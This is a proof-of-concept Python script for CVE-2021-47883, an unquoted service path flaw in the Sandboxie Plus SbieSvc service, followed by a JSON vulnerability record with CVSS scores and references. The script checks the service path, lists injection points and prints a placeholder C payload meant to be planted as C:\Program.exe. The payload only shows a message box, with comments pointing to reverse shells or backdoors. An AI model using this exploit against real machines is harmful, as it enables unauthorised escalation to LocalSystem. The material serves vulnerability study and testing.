CVE-2021-47883

#!/usr/bin/env python3 """ CVE-2021-47883 PoC - Sandboxie Plus SbieSvc Unquoted Service Path This PoC demonstrates the unquoted service path vulnerability in Sandboxie Plus SbieSvc service. Note: This is for educational and authorized testing purposes only. """ import subprocess import os def check_service_path(): """Check if SbieSvc has unquoted path vulnerability""" try: # Query service configuration using sc qc command result = subprocess.run( ['sc', 'qc', 'SbieSvc'], capture_output=True, text=True ) output = result.stdout print("[*] SbieSvc Service Configuration:") print(output) # Check if BINARY_PATH_NAME contains spaces and no quotes if 'BINARY_PATH_NAME' in output: lines = output.split('\n') for line in lines: if 'BINARY_PATH_NAME' in line: path = line.split(':', 1)[1].strip() print(f"\n[*] Service Path: {path}") # Check for vulnerability conditions if ' ' in path and not path.startswith('"'): print("[!] VULNERABLE: Path contains spaces without quotes!") # Extract path components parts = path.split() print(f"[*] Potential injection points:") for i, part in enumerate(parts[:-1]): # Exclude filename potential_path = '\\'.join(parts[:i+1]) print(f" - {potential_path}\.exe") else: print("[+] NOT VULNERABLE: Path is properly quoted") except Exception as e: print(f"[-] Error: {e}") def create_malicious_executable(): """Generate template for malicious executable creation""" # This would be the malicious executable code # For demonstration purposes only evil_code = ''' #include <windows.h> int main() { // Malicious code would be placed here // This would typically create a reverse shell or add a backdoor // Executed with LocalSystem privileges MessageBox(NULL, "CVE-2021-47883 Exploited - Sandboxie Plus SbieSvc", "Privilege Escalation", MB_OK | MB_ICONWARNING); return 0; } ''' print("\n[*] Example malicious executable code template:") print(evil_code) print("[*] Compile and place as 'Program.exe' in C:\\ to exploit") if __name__ == "__main__": print("=" * 60) print("CVE-2021-47883 - Sandboxie Plus SbieSvc Unquoted Path") print("=" * 60) check_service_path() create_malicious_executable() print("\n[*] Reminder: Always obtain proper authorization before testing")

{"cve": {"id": "CVE-2021-47883", "sourceIdentifier": "[email protected]", "published": "2026-01-21T18:16:22.583", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sandboxie Plus 0.7.2 contains an unquoted service path vulnerability in the SbieSvc service that allows local attackers to execute code with elevated privileges. Attackers can exploit the unquoted binary path to inject malicious executables that will be launched with LocalSystem permissions during service startup."}, {"lang": "es", "value": "Sandboxie Plus 0.7.2 contiene una vulnerabilidad de ruta de servicio sin comillas en el servicio SbieSvc que permite a atacantes locales ejecutar código con privilegios elevados. Los atacantes pueden explotar la ruta binaria sin comillas para inyectar ejecutables maliciosos que se iniciarán con permisos de LocalSystem durante el inicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://sandboxie-plus.com/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49631", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/sandboxie-plus-sbiesvc-unquoted-service-path", "source": "[email protected]"}]}}